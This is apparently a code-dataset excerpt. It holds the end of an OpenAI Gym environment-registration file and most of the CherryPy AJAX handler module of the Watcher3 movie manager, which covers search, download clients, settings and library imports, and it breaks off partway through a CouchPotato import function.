kwargs=_merge({'target_position': 'random', 'target_rotation': 'xyz'}, kwargs),
max_episode_steps=100,
)
# Alias for "Full"
register(
id='HandManipulatePen{}-v0'.format(suffix),
entry_point='gym.envs.robotics:HandPenEnv',
kwargs=_merge({'target_position': 'random', 'target_rotation': 'xyz'}, kwargs),
max_episode_steps=100,
)
# Atari
# ----------------------------------------
# # print ', '.join(["'{}'".format(name.split('.')[0]) for name in atari_py.list_games()])
for game in ['air_raid', 'alien', 'amidar', 'assault', 'asterix', 'asteroids', 'atlantis',
'bank_heist', 'battle_zone', 'beam_rider', 'berzerk', 'bowling', 'boxing', 'breakout', 'carnival',
'centipede', 'chopper_command', 'crazy_climber', 'demon_attack', 'double_dunk',
'elevator_action', 'enduro', 'fishing_derby', 'freeway', 'frostbite', 'gopher', 'gravitar',
'hero', 'ice_hockey', 'jamesbond', 'journey_escape', 'kangaroo', 'krull', 'kung_fu_master',
'montezuma_revenge', 'ms_pacman', 'name_this_game', 'phoenix', 'pitfall', 'pong', 'pooyan',
'private_eye', 'qbert', 'riverraid', 'road_runner', 'robotank', 'seaquest', 'skiing',
'solaris', 'space_invaders', 'star_gunner', 'tennis', 'time_pilot', 'tutankham', 'up_n_down',
'venture', 'video_pinball', 'wizard_of_wor', 'yars_revenge', 'zaxxon']:
for obs_type in ['image', 'ram']:
# space_invaders should yield SpaceInvaders-v0 and SpaceInvaders-ram-v0
name = ''.join([g.capitalize() for g in game.split('_')])
if obs_type == 'ram':
name = '{}-ram'.format(name)
nondeterministic = False
if game == 'elevator_action' and obs_type == 'ram':
# ElevatorAction-ram-v0 seems to yield slightly
# non-deterministic observations about 10% of the time. We
# should track this down eventually, but for now we just
# mark it as nondeterministic.
nondeterministic = True
register(
id='{}-v0'.format(name),
entry_point='gym.envs.atari:AtariEnv',
kwargs={'game': game, 'obs_type': obs_type, 'repeat_action_probability': 0.25},
max_episode_steps=10000,
nondeterministic=nondeterministic,
)
register(
id='{}-v4'.format(name),
entry_point='gym.envs.atari:AtariEnv',
kwargs={'game': game, 'obs_type': obs_type},
max_episode_steps=100000,
nondeterministic=nondeterministic,
)
# Standard Deterministic (as in the original DeepMind paper)
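        # (Space Invaders uses a frameskip of 3: with a skip of 4 the blinking
        # lasers can be invisible in every sampled frame.)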
if game == 'space_invaders':
frameskip = 3
else:
frameskip = 4
# Use a deterministic frame skip.
register(
id='{}Deterministic-v0'.format(name),
entry_point='gym.envs.atari:AtariEnv',
kwargs={'game': game, 'obs_type': obs_type, 'frameskip': frameskip, 'repeat_action_probability': 0.25},
max_episode_steps=100000,
nondeterministic=nondeterministic,
)
register(
id='{}Deterministic-v4'.format(name),
entry_point='gym.envs.atari:AtariEnv',
kwargs={'game': game, 'obs_type': obs_type, 'frameskip': frameskip},
max_episode_steps=100000,
nondeterministic=nondeterministic,
)
register(
id='{}NoFrameskip-v0'.format(name),
entry_point='gym.envs.atari:AtariEnv',
kwargs={'game': game, 'obs_type': obs_type, 'frameskip': 1, 'repeat_action_probability': 0.25}, # A frameskip of 1 means we get every frame
max_episode_steps=frameskip * 100000,
nondeterministic=nondeterministic,
)
# No frameskip. (Atari has no entropy source, so these are
# deterministic environments.)
register(
id='{}NoFrameskip-v4'.format(name),
entry_point='gym.envs.atari:AtariEnv',
kwargs={'game': game, 'obs_type': obs_type, 'frameskip': 1}, # A frameskip of 1 means we get every frame
max_episode_steps=frameskip * 100000,
nondeterministic=nondeterministic,
)
# Unit test
# ---------
register(
id='CubeCrash-v0',
entry_point='gym.envs.unittest:CubeCrash',
reward_threshold=0.9,
)
register(
id='CubeCrashSparse-v0',
entry_point='gym.envs.unittest:CubeCrashSparse',
reward_threshold=0.9,
)
register(
id='CubeCrashScreenBecomesBlack-v0',
entry_point='gym.envs.unittest:CubeCrashScreenBecomesBlack',
reward_threshold=0.9,
)
register(
id='MemorizeDigits-v0',
entry_point='gym.envs.unittest:MemorizeDigits',
reward_threshold=20,
)
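# Usage note (added): any id registered above can be instantiated through the
# standard factory, e.g. `import gym; env = gym.make('MyInvertedPendulum-v2')`.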
| [
"[email protected]"
]
| |
3ecb8306c4120d34f4d50837b65d730ed957c23e | df04a39be0cb31fa66a084afa2a4c161839d8d88 | /core/ajax.py | 735c1792f36a713211835a1a5e8c3cfca7979354 | [
"Apache-2.0"
]
| permissive | skyle97/Watcher3 | 58e95febbd81608e9de8ce5486c62c0ec45958d7 | 3eaee90069caee3a7fbff096184de33ad97fe7f3 | refs/heads/master | 2021-01-19T17:10:32.147456 | 2017-08-21T02:43:34 | 2017-08-21T02:43:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 48,912 | py | import json
import logging
import os
import threading
import time
import cherrypy
import datetime
import core
from core import config, library, searchresults, searcher, snatcher, version, movieinfo, notification, plugins
from core.providers import torrent, newznab
from core.downloaders import nzbget, sabnzbd, transmission, qbittorrent, deluge, rtorrent, blackhole
from core.helpers import Conversions
from core.rss import predb
import backup
from gettext import gettext as _
logging = logging.getLogger(__name__)
class Errors():
''' Namespace for common error messages used in AJAX responses '''
database_write = _('Unable to write to database.')
database_read = _('Unable to read {} details from database.')
tmdb_not_found = _('Unable to find {} on TheMovieDB.')
class Ajax(object):
''' These are all the methods that handle ajax post/get requests from the browser.
Except in special circumstances, all should return an 'ajax-style response', which is a
dict with a response key to indicate success, and additional keys for expected data output.
For example {'response': False, 'error': 'something broke'}
{'response': True, 'results': ['this', 'is', 'the', 'output']}
'''
def __init__(self):
self.tmdb = movieinfo.TMDB()
self.config = config.Config()
self.metadata = library.Metadata()
self.predb = predb.PreDB()
self.searcher = searcher.Searcher()
self.score = searchresults.Score()
self.snatcher = snatcher.Snatcher()
self.version = version.Version()
@cherrypy.expose
@cherrypy.tools.json_out()
def library(self, sort_key, sort_direction, limit=50, offset=0):
''' Get 50 movies from library
sort_key (str): column name to sort by
sort_direction (str): direction to sort [ASC, DESC]
limit: int number of movies to get <optional - default 50>
        offset: int list index position to start slice <optional - default 0>
        Gets a slice of up to 'limit' movies from the library sorted by sort key
Returns list of dicts of movies
'''
return core.sql.get_user_movies(sort_key, sort_direction.upper(), limit, offset, hide_finished=core.CONFIG['Server']['hidefinished'])
@cherrypy.expose
@cherrypy.tools.json_out()
def search_tmdb(self, search_term):
''' Search tmdb for movies
search_term (str): title and year of movie (Movie Title 2016)
Returns str json-encoded list of dicts that contain tmdb's data.
'''
results = self.tmdb.search(search_term)
if not results:
logging.info('No Results found for {}'.format(search_term))
return results
@cherrypy.expose
@cherrypy.tools.json_out()
def get_search_results(self, imdbid, quality=None):
''' Gets search results for movie
imdbid (str): imdb id #
quality (str): quality profile for movie <optional - default None>
Passes request to sql.get_search_results() then filters out unused download methods.
Returns dict ajax-style response
'''
results = core.sql.get_search_results(imdbid, quality=quality)
if not core.CONFIG['Downloader']['Sources']['usenetenabled']:
results = [res for res in results if res.get('type') != 'nzb']
if not core.CONFIG['Downloader']['Sources']['torrentenabled']:
results = [res for res in results if res.get('type') != 'torrent']
if not results:
return {'response': False, 'next': Conversions.human_datetime(core.NEXT_SEARCH)}
else:
for i in results:
i['size'] = Conversions.human_file_size(i['size'])
return {'response': True, 'results': results}
@cherrypy.expose
def get_trailer(self, title, year):
''' Gets trailer embed url from youtube
title (str): title of movie
year (str/int): year of movie release
Returns str
'''
return movieinfo.trailer('{} {}'.format(title, year))
@cherrypy.expose
@cherrypy.tools.json_out()
def add_wanted_movie(self, data):
''' Adds movie to library
data (str): json-formatted dict of known movie data
Calls library.Manage.add_movie to add to library.
Returns dict ajax-style response
'''
movie = json.loads(data)
return core.manage.add_movie(movie, full_metadata=False)
@cherrypy.expose
@cherrypy.tools.json_out()
def save_settings(self, data):
''' Saves settings to config file
data (dict): of Section with nested dict of keys and values:
{'Section': {'key': 'val', 'key2': 'val2'}, 'Section2': {'key': 'val'}}
All dicts must contain the full tree or data will be lost.
        Fires off additional methods if necessary, i.e. scheduler restart/reloads
Returns dict ajax-style response
'''
logging.info('Saving settings.')
data = json.loads(data)
save_data = {}
for key in data:
if data[key] != core.CONFIG[key]:
save_data[key] = data[key]
if not save_data:
return {'response': True, 'message': _('Settings saved.')}
try:
self.config.write(save_data)
except (SystemExit, KeyboardInterrupt):
raise
except Exception as e:
logging.error('Writing config.', exc_info=True)
return {'response': False, 'error': _('Unable to write to config file.')}
return {'response': True, 'message': _('Settings saved.')}
@cherrypy.expose
@cherrypy.tools.json_out()
def remove_movie(self, imdbid):
''' Removes movie
imdbid (str): imdb id #
Returns dict ajax-style response
'''
return core.manage.remove_movie(imdbid)
@cherrypy.expose
@cherrypy.tools.json_out()
def delete_movie_file(self, imdbid):
''' Deletes movie file for imdbid
imdbid (str): imdb id #
Returns dict ajax-style response
'''
logging.info('Deleting file for {}.'.format(imdbid))
f = core.sql.get_movie_details('imdbid', imdbid).get('finished_file')
try:
logging.debug('Finished file for {} is {}'.format(imdbid, f))
os.unlink(f)
return {'response': True, 'message': _('Deleted movie file {}.').format(f)}
except Exception as e:
logging.error('Unable to delete file {}'.format(f), exc_info=True)
return {'response': False, 'error': str(e)}
@cherrypy.expose
@cherrypy.tools.json_out()
def search(self, imdbid):
''' Search indexers for specific movie.
imdbid (str): imdb id #
Gets movie data from database and sends to searcher.search()
Returns dict ajax-style response
'''
movie = core.sql.get_movie_details("imdbid", imdbid)
if not movie:
return {'response': False, 'error': Errors.database_read.format(imdbid)}
else:
success = self.searcher.search(imdbid, movie['title'], movie['year'], movie['quality'])
status = core.sql.get_movie_details("imdbid", imdbid)['status']
if success:
results = core.sql.get_search_results(imdbid, movie['quality'])
for i in results:
i['size'] = Conversions.human_file_size(i['size'])
return {'response': True, 'results': results, 'movie_status': status, 'next': Conversions.human_datetime(core.NEXT_SEARCH)}
else:
return {'response': False, 'error': Errors.database_read.format(imdbid), 'movie_status': status}
@cherrypy.expose
@cherrypy.tools.json_out()
def manual_download(self, year, guid, kind):
''' Sends search result to downloader manually
guid (str): download link for nzb/magnet/torrent file.
kind (str): type of download (torrent, magnet, nzb)
Returns dict ajax-style response
'''
torrent_enabled = core.CONFIG['Downloader']['Sources']['torrentenabled']
usenet_enabled = core.CONFIG['Downloader']['Sources']['usenetenabled']
if kind == 'nzb' and not usenet_enabled:
            return {'response': False, 'error': _('Link is NZB but no Usenet client is enabled.')}
elif kind in ('torrent', 'magnet') and not torrent_enabled:
return {'response': False, 'error': _('Link is Torrent/Magnet but no Torrent client is enabled.')}
data = dict(core.sql.get_single_search_result('guid', guid))
if data:
data['year'] = year
return self.snatcher.download(data)
else:
return {'response': False, 'error': Errors.database_read.format(kind)}
@cherrypy.expose
@cherrypy.tools.json_out()
def mark_bad(self, guid, imdbid, cancel_download=False):
''' Marks guid as bad in SEARCHRESULTS and MARKEDRESULTS
guid (str): guid of download to mark
imdbid (str): imdb id # of movie
cancel_download (bool): send command to download client to cancel download
Returns dict ajax-style response
'''
sr_orig = core.sql.get_single_search_result('guid', guid)
sr = core.manage.searchresults(guid, 'Bad')
core.manage.markedresults(guid, 'Bad', imdbid=imdbid)
if sr:
response = {'response': True, 'message': _('Marked release as Bad.')}
else:
response = {'response': False, 'error': Errors.database_write}
response['movie_status'] = core.manage.movie_status(imdbid)
if not response['movie_status']:
response['error'] = (Errors.database_write)
response['response'] = False
if cancel_download:
cancelled = False
if sr_orig.get('status') != 'Snatched':
return response
client = sr_orig['download_client'] if sr_orig else None
downloadid = sr_orig['downloadid'] if sr_orig else None
if not client:
logging.info('Download client not found, cannot cancel download.')
return response
elif client == 'NZBGet':
cancelled = nzbget.Nzbget.cancel_download(downloadid)
elif client == 'SABnzbd':
cancelled = sabnzbd.Sabnzbd.cancel_download(downloadid)
elif client == 'QBittorrent':
cancelled = qbittorrent.QBittorrent.cancel_download(downloadid)
elif client == 'DelugeRPC':
cancelled = deluge.DelugeRPC.cancel_download(downloadid)
elif client == 'DelugeWeb':
cancelled = deluge.DelugeWeb.cancel_download(downloadid)
elif client == 'Transmission':
cancelled = transmission.Transmission.cancel_download(downloadid)
elif client == 'rTorrentSCGI':
cancelled = rtorrent.rTorrentSCGI.cancel_download(downloadid)
elif client == 'rTorrentHTTP':
cancelled = rtorrent.rTorrentHTTP.cancel_download(downloadid)
if not cancelled:
response['response'] = False
response['error'] = response.get('error', '') + _(' Could not remove download from client.')
return response
@cherrypy.expose
def notification_remove(self, index):
''' Removes notification from core.notification
index (str/int): index of notification to remove
'index' will be of type string since it comes from ajax request.
Therefore we convert to int here before passing to Notification
Simply calls Notification module.
Does not return
'''
notification.remove(int(index))
return
@cherrypy.expose
@cherrypy.tools.json_out()
def update_check(self):
''' Manually check for updates
Returns list:
[0] dict ajax-style response
[1] dict of core notifications
'''
response = self.version.manager.update_check()
if response['status'] == 'current':
n = [[{'message': _('No updates available.')}, {'type': 'primary'}]]
return [response, n]
else:
return [response, core.NOTIFICATIONS]
@cherrypy.expose
@cherrypy.tools.json_out()
def test_downloader_connection(self, mode, data):
''' Test connection to downloader.
mode (str): which downloader to test.
data (dict): connection information (url, port, login, etc)
Executes staticmethod in the chosen downloader's class.
Returns dict ajax-style response
'''
response = {}
data = json.loads(data)
if mode == 'sabnzbd':
test = sabnzbd.Sabnzbd.test_connection(data)
elif mode == 'nzbget':
test = nzbget.Nzbget.test_connection(data)
elif mode == 'blackhole':
test = blackhole.Base.test_connection(data)
elif mode == 'transmission':
test = transmission.Transmission.test_connection(data)
elif mode == 'delugerpc':
test = deluge.DelugeRPC.test_connection(data)
elif mode == 'delugeweb':
test = deluge.DelugeWeb.test_connection(data)
elif mode == 'qbittorrent':
test = qbittorrent.QBittorrent.test_connection(data)
elif mode == 'rtorrentscgi':
test = rtorrent.rTorrentSCGI.test_connection(data)
elif mode == 'rtorrenthttp':
test = rtorrent.rTorrentHTTP.test_connection(data)
if test is True:
response['response'] = True
response['message'] = _('Connection successful.')
else:
response['response'] = False
response['error'] = test
return response
@cherrypy.expose
def server_status(self, mode):
''' Check or modify status of CherryPy server_status
mode (str): command or request of state
Restarts or Shuts Down server in separate thread.
Delays by one second to allow browser to redirect.
If mode == 'online', asks server for status.
(ENGINE.started, ENGINE.stopped, etc.)
Returns nothing for mode == restart || shutdown
Returns str server state if mode == online
'''
if mode == 'restart':
threading.Timer(1, core.restart).start()
return
elif mode == 'shutdown':
threading.Timer(1, core.shutdown).start()
return
elif mode == 'online':
return str(cherrypy.engine.state)
@cherrypy.expose
def update_server(self, mode):
''' Starts and executes update process.
mode (str): 'set_true' or 'update_now'
This method has two major functions based on mode
set_true:
Sets core.UPDATING to True, the browser should then automatically redirect
the user to the update page that calls update_server('update_now')
update_now:
Starts update process:
* Stops task scheduler to cancel all Timers
* Waits for in-process tasks to finish. Yields to browser a list of
currently-running tasks every 1.5 seconds
* Yields updating message to browser. Calls update method
* Sets core.UPDATING to False
* Yields response from update method to browser
If False, starts scheduler plugin again to get back to a normal state
If True, calls restart method. Browser is responsible for redirecting
                    after the server is back up.
Returns dict ajax-style response
'''
if mode == 'set_true':
core.UPDATING = True
return json.dumps({'response': True})
if mode == 'update_now':
logging.info('Update process started.')
core.scheduler_plugin.stop()
active_tasks = [k for k, v in core.scheduler_plugin.task_list.items() if v.running]
while len(active_tasks) > 0:
yield json.dumps({'response': True, 'status': 'waiting', 'active_tasks': active_tasks})
active_tasks = [k for k, v in core.scheduler_plugin.task_list.items() if v.running]
time.sleep(1.5)
yield json.dumps({'response': True, 'status': 'updating'})
update_status = version.Version().manager.execute_update()
core.UPDATING = False
if update_status is False:
logging.error('Update Failed.')
yield json.dumps({'response': False, 'error': _('Unable to complete update.')})
core.scheduler_plugin.restart()
elif update_status is True:
yield json.dumps({'response': True, 'status': 'complete'})
self.server_status('restart')
else:
return json.dumps({'response': False})
update_server._cp_config = {'response.stream': True, 'tools.gzip.on': False}
@cherrypy.expose
@cherrypy.tools.json_out()
def update_movie_options(self, quality, status, imdbid):
''' Updates quality settings for individual title
quality (str): name of new quality
status (str): management state ('automatic', 'disabled')
imdbid (str): imdb identification number
Returns dict ajax-style response
'''
success = {'response': True, 'message': _('Movie settings updated.')}
logging.info('Updating quality profile to {} for {}.'.format(quality, imdbid))
if not core.sql.update('MOVIES', 'quality', quality, 'imdbid', imdbid):
return {'response': False, 'error': Errors.database_write}
logging.info('Updating status to {} for {}.'.format(status, imdbid))
if status == 'Automatic':
if not core.sql.update('MOVIES', 'status', 'Waiting', 'imdbid', imdbid):
return {'response': False, 'error': Errors.database_write}
new_status = core.manage.movie_status(imdbid)
if not new_status:
return {'response': False, 'error': Errors.database_write}
else:
success['status'] = new_status
return success
elif status == 'Disabled':
if not core.sql.update('MOVIES', 'status', 'Disabled', 'imdbid', imdbid):
return {'response': False, 'error': Errors.database_write}
else:
success['status'] = 'Disabled'
return success
@cherrypy.expose
def get_log_text(self, logfile):
''' Gets log file contents
logfile (str): name of log file to read
logfile should be filename only, not the path to the file
Returns str
'''
logging.info('Dumping log file {} to text.'.format(logfile))
with open(os.path.join(core.LOG_DIR, logfile), 'r') as f:
log_text = ''.join(reversed(f.readlines()))
return log_text
@cherrypy.expose
@cherrypy.tools.json_out()
def indexer_test(self, indexer, apikey, mode):
''' Tests connection to newznab indexer
indexer (str): url of indexer
apikey (str): indexer's api key
mode (str): newznab or torznab
Returns dict ajax-style response
'''
if mode == 'newznab':
return newznab.NewzNab.test_connection(indexer, apikey)
elif mode == 'torznab':
return torrent.Torrent.test_connection(indexer, apikey)
else:
return {'response': False, 'error': _('Invalid test mode.')}
@cherrypy.expose
@cherrypy.tools.json_out()
def get_plugin_conf(self, folder, conf):
''' Calls plugin_conf_popup to render html
folder (str): folder to read config file from
conf (str): filename of config file (ie 'my_plugin.conf')
Returns string
'''
c = os.path.join(core.PLUGIN_DIR, folder, conf)
logging.info('Reading plugin config {}'.format(c))
try:
with open(c) as f:
config = json.load(f)
except Exception as e:
logging.error("Unable to read config file.", exc_info=True)
return ''
return plugins.render_config(config)
@cherrypy.expose
@cherrypy.tools.json_out()
def save_plugin_conf(self, folder, filename, config):
''' Calls plugin_conf_popup to render html
folder (str): folder to store config file
filename (str): filename of config file (ie 'my_plugin.conf')
config (str): json data to store in conf file
Returns dict ajax-style response
'''
conf_file = os.path.join(core.PROG_PATH, core.PLUGIN_DIR, folder, filename)
logging.info('Saving plugin config as {}'.format(conf_file))
config = json.loads(config)
response = {'response': True, 'message': _('Settings saved.')}
try:
with open(conf_file, 'w') as output:
json.dump(config, output, indent=2)
except Exception as e:
response = {'response': False, 'error': str(e)}
return response
@cherrypy.expose
def scan_library_directory(self, directory, minsize, recursive):
''' Calls library to scan directory for movie files
directory (str): directory to scan
minsize (str/int): minimum file size in mb, coerced to int
        recursive (bool): whether or not to search subdirs
Finds all files larger than minsize in directory.
Removes all movies from gathered list that are already in library.
If error, yields {'error': reason} and stops Iteration
If movie has all metadata, yields:
{'complete': {<metadata>}}
If missing imdbid or resolution, yields:
            {'incomplete': {<known metadata>}}
All metadata dicts include:
'path': 'absolute path to file'
'progress': '10 of 250'
        Yields dict ajax-style response
'''
recursive = json.loads(recursive)
minsize = int(minsize)
files = core.library.ImportDirectory.scan_dir(directory, minsize, recursive)
if files.get('error'):
yield json.dumps({'error': files['error']})
            return
library = [i['imdbid'] for i in core.sql.get_user_movies()]
files = files['files']
length = len(files)
if length == 0:
yield json.dumps({'response': None})
            return
logging.info('Parsing {} directory scan results.'.format(length))
for index, path in enumerate(files):
            logging.info('Gathering metadata for {}'.format(path))
metadata = {}
response = {'progress': [index + 1, length]}
try:
metadata = self.metadata.from_file(path)
if not metadata.get('imdbid'):
metadata['imdbid'] = ''
logging.info('IMDB unknown for import {}'.format(metadata['title']))
response['response'] = 'incomplete'
elif metadata['imdbid'] in library:
logging.info('{} ({}) already in library, ignoring.'.format(metadata['title'], path))
response['response'] = 'in_library'
elif not metadata.get('resolution'):
logging.info('Resolution/Source unknown for import {}'.format(metadata['title']))
response['response'] = 'incomplete'
else:
logging.info('All data found for import {}'.format(metadata['title']))
response['response'] = 'complete'
if response['response'] == 'complete':
p = metadata.get('poster_path')
metadata = self.metadata.convert_to_db(metadata)
metadata['poster_path'] = p
metadata['size'] = os.path.getsize(path)
metadata['human_size'] = Conversions.human_file_size(metadata['size'])
metadata['finished_file'] = path
if response['response'] == 'in_library':
metadata = {'title': metadata['title']}
response['movie'] = metadata
yield json.dumps(response)
except Exception as e:
logging.warning('Error gathering metadata.', exc_info=True)
yield json.dumps({'response': 'incomplete', 'movie': metadata})
continue
scan_library_directory._cp_config = {'response.stream': True, 'tools.gzip.on': False}
@cherrypy.expose
def import_dir(self, movies, corrected_movies):
''' Imports list of movies in data
movie_data (list): dicts of movie info ready to import
corrected_movies (list): dicts of user-corrected movie info
corrected_movies must be [{'/path/to/file': {'known': 'metadata'}}]
        Iterates through corrected_movies and attempts to get metadata again if required.
If imported, generates and stores fake search result.
Creates dict {'success': [], 'failed': []} and
appends movie data to the appropriate list.
        Yields dict ajax-style response
'''
logging.info('Adding directory scan movies to library.')
today = str(datetime.date.today())
movie_data = json.loads(movies)
corrected_movies = json.loads(corrected_movies)
fake_results = []
success = []
length = len(movie_data) + len(corrected_movies)
progress = 1
if corrected_movies:
logging.info('{} corrected movies, gathering metadata.'.format(len(corrected_movies)))
for data in corrected_movies:
tmdbdata = self.tmdb._search_tmdbid(data['tmdbid'])
if tmdbdata:
tmdbdata = tmdbdata[0]
data['year'] = tmdbdata['release_date'][:4]
data.update(tmdbdata)
movie_data.append(data)
else:
logging.error('Unable to find {} on TMDB.'.format(data['tmdbid']))
yield json.dumps({'response': False, 'movie': data, 'progress': [progress, length], 'error': Errors.tmdb_not_found.format(data['tmdbid'])})
progress += 1
logging.info('Adding {} directory scan movies to library.'.format(len(movie_data)))
for movie in movie_data:
if movie.get('imdbid'):
movie['status'] = 'Disabled'
movie['predb'] = 'found'
movie['origin'] = 'Directory Import'
movie['finished_date'] = today
movie['id'] = movie['tmdbid']
response = core.manage.add_movie(movie, full_metadata=True)
if response['response'] is True:
fake_results.append(searchresults.generate_simulacrum(movie))
yield json.dumps({'response': True, 'progress': [progress, length], 'movie': movie})
progress += 1
success.append(movie)
continue
else:
yield json.dumps({'response': False, 'movie': movie, 'progress': [progress, length], 'error': response['error']})
progress += 1
continue
else:
logging.error('Unable to find {} on TMDB.'.format(movie['title']))
logging.debug(movie)
yield json.dumps({'response': False, 'movie': movie, 'progress': [progress, length], 'error': Errors.tmdb_not_found.format(data['title'])})
progress += 1
fake_results = self.score.score(fake_results, imported=True)
for i in success:
score = None
for r in fake_results:
if r['imdbid'] == i['imdbid']:
score = r['score']
break
if score:
core.sql.update('MOVIES', 'finished_score', score, 'imdbid', i['imdbid'])
core.sql.write_search_results(fake_results)
import_dir._cp_config = {'response.stream': True, 'tools.gzip.on': False}
@cherrypy.expose
@cherrypy.tools.json_out()
def list_files(self, current_dir, move_dir):
''' Lists files in directory
current_dir (str): base path
move_dir (str): child path to read
Joins and normalizes paths:
('/home/user/movies', '..')
Becomes /home/user
Returns dict ajax-style response
'''
current_dir = current_dir.strip()
move_dir = move_dir.strip()
response = {}
new_path = os.path.normpath(os.path.join(current_dir, move_dir))
response['new_path'] = new_path
try:
response['list'] = [i for i in os.listdir(new_path) if os.path.isdir(os.path.join(new_path, i)) and not i.startswith('.')]
except Exception as e:
response = {'error': str(e)}
logging.error('Error listing directory.', exc_info=True)
return response
@cherrypy.expose
@cherrypy.tools.json_out()
def update_metadata(self, imdbid, tmdbid=None):
''' Re-downloads metadata for imdbid
imdbid (str): imdbid of movie
tmdbid (str): tmdbid of movie <optional - default None>
If tmdbid is None, looks in database for tmdbid using imdbid.
If that fails, looks on tmdb api for imdbid
If that fails returns error message
Returns dict ajax-style response
'''
r = self.metadata.update(imdbid, tmdbid)
if r['response'] is True:
return {'response': True, 'message': _('Metadata updated.')}
else:
return r
@cherrypy.expose
@cherrypy.tools.json_out()
def get_kodi_movies(self, url):
''' Gets list of movies from kodi server
url (str): url of kodi server
Calls Kodi import method to gather list.
Returns dict ajax-style response
'''
return library.ImportKodiLibrary.get_movies(url)
@cherrypy.expose
def import_kodi_movies(self, movies):
        ''' Imports list of movies from Kodi library
movie_data (str): json-formatted list of dicts of movies
Iterates through movies and gathers all required metadata.
If imported, generates and stores fake search result.
Creates dict {'success': [], 'failed': []} and
appends movie data to the appropriate list.
        Yields dict ajax-style response
'''
movies = json.loads(movies)
fake_results = []
success = []
length = len(movies)
progress = 1
logging.info('Adding {} Kodi movies to library.'.format(length))
for movie in movies:
tmdb_data = self.tmdb._search_imdbid(movie['imdbid'])
if not tmdb_data or not tmdb_data.get('id'):
yield json.dumps({'response': False, 'movie': movie, 'progress': [progress, length], 'error': Errors.tmdb_not_found.format(movie['imdbid'])})
progress += 1
continue
movie['id'] = tmdb_data['id']
movie['size'] = 0
movie['status'] = 'Disabled'
movie['predb'] = 'found'
movie['finished_file'] = movie.get('finished_file', '').strip()
movie['origin'] = 'Kodi Import'
response = core.manage.add_movie(movie)
if response['response'] is True:
fake_results.append(searchresults.generate_simulacrum(movie))
yield json.dumps({'response': True, 'progress': [progress, length], 'movie': movie})
progress += 1
success.append(movie)
continue
else:
yield json.dumps({'response': False, 'movie': movie, 'progress': [progress, length], 'error': response['error']})
progress += 1
continue
fake_results = self.score.score(fake_results, imported=True)
for i in success:
score = None
for r in fake_results:
if r['imdbid'] == i['imdbid']:
score = r['score']
break
if score:
core.sql.update('MOVIES', 'finished_score', score, 'imdbid', i['imdbid'])
core.sql.write_search_results(fake_results)
import_kodi_movies._cp_config = {'response.stream': True, 'tools.gzip.on': False}
@cherrypy.expose
@cherrypy.tools.json_out()
def upload_plex_csv(self, file_input):
        ''' Receives upload of csv from browser
        file_input (b'str): csv file to read
Reads/parses csv file into a usable dict
Returns dict ajax-style response
'''
try:
csv_text = file_input.file.read().decode('utf-8')
file_input.file.close()
except Exception as e:
logging.error('Unable to parse Plex CSV', exc_info=True)
return {'response': False, 'error': str(e)}
if csv_text:
return library.ImportPlexLibrary.read_csv(csv_text)
else:
return {'response': True, 'complete': [], 'incomplete': []}
@cherrypy.expose
def import_plex_csv(self, movies, corrected_movies):
        ''' Imports list of movies generated by csv import
movie_data (list): dicts of movie info ready to import
corrected_movies (list): dicts of user-corrected movie info
        Iterates through corrected_movies and attempts to get metadata again if required.
If imported, generates and stores fake search result.
Creates dict {'success': [], 'failed': []} and
appends movie data to the appropriate list.
        Yields dict ajax-style response
'''
movie_data = json.loads(movies)
corrected_movies = json.loads(corrected_movies)
fake_results = []
success = []
length = len(movie_data) + len(corrected_movies)
progress = 1
if corrected_movies:
logging.info('Adding {} Plex movies to library.'.format(len(corrected_movies)))
for movie in corrected_movies:
tmdbdata = self.tmdb._search_imdbid(movie['imdbid'])
if tmdbdata:
tmdbdata = tmdbdata[0]
movie['year'] = tmdbdata['release_date'][:4]
movie.update(tmdbdata)
movie_data.append(movie)
else:
logging.error(Errors.tmdb_not_found.format(movie['imdbid']))
yield json.dumps({'response': False, 'movie': movie, 'progress': [progress, length], 'error': Errors.tmdb_not_found.format(movie['imdbid'])})
progress += 1
logging.info('Adding {} Plex movies to library.'.format(length))
for movie in movie_data:
logging.info('Importing Plex movie {} {}'.format(movie.get('title', ''), movie.get('year', '')))
fm = False
if not movie.get('imdbid') and movie.get('tmdbid'):
tmdb_data = self.tmdb._search_tmdbid(movie['tmdbid'])
if tmdb_data:
movie.update(tmdb_data[0])
fm = True
else:
yield json.dumps({'response': False, 'progress': [progress, length], 'title': movie['title'], 'error': Errors.tmdb_not_found.format(movie['tmdbid'])})
progress += 1
continue
if movie.get('imdbid'):
movie['status'] = 'Disabled'
movie['predb'] = 'found'
movie['origin'] = 'Plex Import'
if not movie.get('id'):
tmdb_data = self.tmdb._search_imdbid(movie['imdbid'])
if tmdb_data:
movie.update(tmdb_data[0])
else:
yield json.dumps({'response': False, 'progress': [progress, length], 'title': movie['title'], 'error': Errors.tmdb_not_found.format(movie['imdbid'])})
progress += 1
continue
response = core.manage.add_movie(movie, full_metadata=fm)
if response['response'] is True:
fake_results.append(searchresults.generate_simulacrum(movie))
yield json.dumps({'response': True, 'progress': [progress, length], 'title': movie['title'], 'imdbid': movie['imdbid']})
progress += 1
success.append(movie)
continue
else:
yield json.dumps({'response': False, 'progress': [progress, length], 'error': response['error'], 'title': movie['title']})
progress += 1
continue
else:
logging.error(Errors.tmdb_not_found.format(movie['title']))
yield json.dumps({'response': False, 'progress': [progress, length], 'error': _('Unable to find IMDB ID for {} on TheMovieDB.').format(movie['title']), 'title': movie['title']})
progress += 1
continue
if fake_results:
fake_results = self.score.score(fake_results, imported=True)
for i in success:
score = None
for r in fake_results:
if r['imdbid'] == i['imdbid']:
score = r['score']
break
if score:
core.sql.update('MOVIES', 'finished_score', score, 'imdbid', i['imdbid'])
if fake_results:
core.sql.write_search_results(fake_results)
import_plex_csv._cp_config = {'response.stream': True, 'tools.gzip.on': False}
@cherrypy.expose
@cherrypy.tools.json_out()
def get_cp_movies(self, url, apikey):
''' Gets movies from CP server
url (str): url to cp server
apikey (str): cp api key
Reads/parses cp api response
Returns dict ajax-style response
'''
url = '{}/api/{}/movie.list/'.format(url, apikey)
if not url.startswith('http'):
url = 'http://{}'.format(url)
return library.ImportCPLibrary.get_movies(url)
@cherrypy.expose
def import_cp_movies(self, wanted, finished):
''' Imports movies from CP list to library
wanted (list): dicts of wanted movies
finished (list): dicts of finished movies
Yields dict ajax-style response
'''
wanted = json.loads(wanted)
finished = json.loads(finished)
fake_results = []
success = []
length = len(wanted) + len(finished)
progress = 1
logging.info('Adding {} Wanted CouchPotato movies to library.'.format(len(wanted)))
for movie in wanted:
response = core.manage.add_movie(movie, full_metadata=True)
if response['response'] is True:
